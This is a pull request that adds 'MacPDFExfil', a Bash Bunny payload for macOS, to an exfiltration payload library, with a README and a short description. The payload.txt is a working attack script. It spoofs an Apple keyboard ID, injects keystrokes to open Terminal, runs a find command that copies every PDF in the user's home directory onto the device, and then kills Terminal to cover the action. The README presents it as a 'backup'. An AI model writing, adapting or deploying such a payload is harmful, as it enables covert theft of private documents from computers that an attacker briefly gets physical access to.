### PR TITLE
MacPDFExfil

### DIFF
--- a/payloads/library/exfiltration/MacPDFExfil/README.md
+++ b/payloads/library/exfiltration/MacPDFExfil/README.md
@@ -1,0 +1,15 @@
+# MacPDFExfil
+
+Author: k1ul3ss  
+Version: Version 1.0  
+Target: macOS  
+
+## Description
+
+Mounts as storage and acts as HID. Backup PDF files to the BashBunny
+
+## Configuration
+
+Configured to copy all PDFs located in the users home directory to the BashBunnny
+
+## STATUS

--- a/payloads/library/exfiltration/MacPDFExfil/payload.txt
+++ b/payloads/library/exfiltration/MacPDFExfil/payload.txt
@@ -1,0 +1,29 @@
+﻿#!/bin/bash
+#
+# Title:         MacPDFExfil
+# Author:        k1ul3ss
+# Props:         audibleblink
+# Version:       1.0
+# Category:      Exfiltration
+# Target:        macOS
+# Attackmodes:   HID, Storage
+
+ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E
+
+# device name
+dev_name="BashBunny"
+
+# loot directory
+lootdir="/Volumes/$dev_name/loot/"
+
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 3000
+# Find all PDFs stored in the user's home directory, and copy them over to the BashBunny storage.
+QUACK STRING find \~ -name \'*.pdf\' -exec cp \"{}\" $lootdir \\\;\; killall Terminal
+QUACK ENTER
+
+# sync the filesystem
+sync


### PR DESCRIPTION
Finds PDFs located in the Mac users home directory and copies them over to the BashBunny Storage.